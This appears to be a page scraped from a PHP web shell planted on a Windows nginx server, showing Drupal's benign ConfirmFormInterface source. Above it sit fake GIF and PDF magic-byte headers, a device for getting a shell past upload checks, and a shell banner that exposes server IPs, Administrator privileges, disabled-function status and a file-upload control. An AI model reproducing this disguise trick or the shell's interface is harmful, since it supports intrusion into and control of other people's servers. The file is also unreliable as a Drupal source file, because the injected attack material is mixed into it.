GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Student/JimMartinson/Lab12/drupal/core/lib/Drupal/Core/Form/ |
Upload File : |
<?php namespace Drupal\Core\Form; /** * Defines the behavior a confirmation form. */ interface ConfirmFormInterface extends FormInterface { /** * Returns the question to ask the user. * * @return string * The form question. The page title will be set to this value. */ public function getQuestion(); /** * Returns the route to go to if the user cancels the action. * * @return \Drupal\Core\Url * A URL object. */ public function getCancelUrl(); /** * Returns additional text to display as a description. * * @return string * The form description. */ public function getDescription(); /** * Returns a caption for the button that confirms the action. * * @return string * The form confirmation text. */ public function getConfirmText(); /** * Returns a caption for the link which cancels the action. * * @return string * The form cancellation text. */ public function getCancelText(); /** * Returns the internal name used to refer to the confirmation item. * * @return string * The internal form name. */ public function getFormName(); }